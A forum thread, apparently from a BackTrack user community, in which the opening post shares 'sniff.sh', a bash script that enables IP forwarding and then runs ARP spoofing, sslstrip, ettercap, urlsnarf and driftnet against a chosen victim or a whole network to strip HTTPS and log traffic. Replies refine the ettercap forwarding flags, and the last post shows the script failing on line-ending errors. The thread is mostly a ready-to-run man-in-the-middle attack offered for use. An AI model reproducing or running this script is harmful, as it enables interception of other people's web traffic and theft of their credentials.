Results 1 to 6 of 6

Thread: sniff.sh for BT5

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default sniff.sh for BT5

    It was small problem with script running on BT5.
    It's fixed now, though I didn't tested it fully.

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT5
    # BY gHero,cseven,spudgunman.
    # Ver 0.3
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'; bash' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'; bash' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt ; bash' &
    
    # DRIFTNET
    driftnet -p -i $INT &

  2. #2
    Member
    Join Date
    Jan 2010
    Location
    Netherlands
    Posts
    84

    Default Re: sniff.sh for BT5

    can't test it right now but looks nice! Will give it a try sometime, thanks!

  3. #3
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: sniff.sh for BT5

    Quote Originally Posted by ghero View Post
    echo '1' > /proc/sys/net/ipv4/ip_forward
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &
    I say the following with all due respect; but the honesty and truth in what I say must be stated without worrying about hurt feelings.

    Please....Stop being a damn script kiddie with these tools. They are weapons, and you are mishandling them. Read the instructions before you use a weapon, otherwise your going to have undesired effects.

    Here is my best advice to you guys/gals. I am going to use the 4 Marine Corps weapons safety rules as an example:
    • Treat every weapon as if it were loaded
    • Never point a weapon at anything you do not intend to shoot
    • Keep your finger straight and off the trigger until you intend to fire
    • Keep you weapon on safe until you intend to fire


    For MITM style attacks that use ARP you must first decide if you wish to do the packet forwarding using ettercap or the kernel. The caveat here is that if you wish to do anything really cool with ettercap you must use it in offensive mode. It uses offensive mode by default. To disable offensive mode append the flag: -u to the syntax. Otherwise You will get double packets or break the process all together (reference trying to run offensive mode against a SoftAP via Airbase-NG in conjunction with kernel forwarding).

    If you want to use the kernel for forwarding the following syntax would be proper:
    Code:
    echo '1' > /proc/sys/net/ipv4/ip_forward
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -u -i '$INT' ; bash' &
    If you want to use ettercap for the forwarding disregard any usage of the kernel: i.e. do not echo a 1 into ip_forward. This is strongly recommended because using ettercap allows you to do some really neat stuff.
    I started to directly modify yer code and post it here for you with my own little takes on it, but stopped a quarter of the way through and erased because my help was not asked for, therefore would have been intollerably rude of me to be modifying yer coding without asking. I will be more than happy to help you make this into a beast of a script, if ya want. If not I understand and do not take any offense. Let me know.


    V/r,
    Snafu
    Pffbt..
    I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass..

  4. #4
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    1

    Default Re: sniff.sh for BT5

    Quote Originally Posted by snafu777 View Post
    Here is my best advice to you guys/gals. I am going to use the 4 Marine Corps weapons safety rules as an example:
    • Treat every weapon as if it were loaded
    • Never point a weapon at anything you do not intend to shoot
    • Keep your finger straight and off the trigger until you intend to fire
    • Keep you weapon on safe until you intend to fire

    There is a 5th rule:
    - Know your target and what lies beyond it.

    I know how to use all these weapons now but way back in a day I started out by downloading scripts and observing what they do, although I can write my own scripts, which I do for more complicated stuff, its easier to just download one and save yourself some time on a simple MITM attack.

  5. #5
    Just burned his ISO jacko's Avatar
    Join Date
    Jan 2011
    Posts
    13

    Default Re: sniff.sh for BT5

    Quote Originally Posted by snafu777 View Post
    For MITM style attacks that use ARP you must first decide if you wish to do the packet forwarding using ettercap or the kernel. The caveat here is that if you wish to do anything really cool with ettercap you must use it in offensive mode. It uses offensive mode by default. To disable offensive mode append the flag: -u to the syntax. Otherwise You will get double packets or break the process all together (reference trying to run offensive mode against a SoftAP via Airbase-NG in conjunction with kernel forwarding).

    If you want to use the kernel for forwarding the following syntax would be proper:
    Code:
    echo '1' > /proc/sys/net/ipv4/ip_forward
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -u -i '$INT' ; bash' &
    If you want to use ettercap for the forwarding disregard any usage of the kernel: i.e. do not echo a 1 into ip_forward. This is strongly recommended because using ettercap allows you to do some really neat stuff.
    I started to directly modify yer code and post it here for you with my own little takes on it, but stopped a quarter of the way through and erased because my help was not asked for, therefore would have been intollerably rude of me to be modifying yer coding without asking. I will be more than happy to help you make this into a beast of a script, if ya want.
    qft.. when I was writing my script micheal jacksons touch.. I saw this in wireshark- it takes some messing around to see ettercap forwards though

  6. #6
    Member
    Join Date
    Jan 2010
    Location
    Netherlands
    Posts
    84

    Default Re: sniff.sh for BT5

    Just tested it:
    root@bt:~/Desktop/scripts# bash sniff.sh
    : command not found
    : command not found

    .__ _____ _____ .__
    ______ ____ |__|/ ____\/ ____\ _____| |__
    / ___// \| \ __\\ __\ / ___/ | \
    \___ \| | \ || | | | \___ \| Y \
    /____ >___| /__||__| |__| /\/____ >___| /
    \/ \/ \/ \/ \/

    : command not found
    : command not found
    : No such file or directorys/net/ipv4/ip_forward
    : command not found
    : command not found
    'ptables v1.4.4: unknown option `--flush
    Try `iptables -h' or 'iptables --help' for more information.
    sleep: invalid time interval `1\r'
    Try `sleep --help' for more information.
    : command not found
    : command not found
    : command not found
    : command not foundRP a (T)arget or full (N)etwork? sniff.sh: line 30:
    Was hoping for a new sniffing.sh script just like the same from:
    http://www.backtrack-linux.org/forum...-urlsnarf.html
    to bad I am a linux code noob

Similar Threads

  1. Doing a ssl sniff on a lan
    By Mutchako in forum Beginners Forum
    Replies: 2
    Last Post: 09-30-2010, 01:34 AM
  2. Ssl Sniff Script
    By iLoad in forum Tutorials und Howtos
    Replies: 1
    Last Post: 04-08-2010, 03:03 PM
  3. SSL Sniff
    By fuurio in forum BT Videos - ES
    Replies: 0
    Last Post: 03-07-2010, 05:41 AM
  4. Sniff SSL
    By Joseph69 in forum OLD BackTrack 4 (pre) Final
    Replies: 4
    Last Post: 09-05-2009, 02:11 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •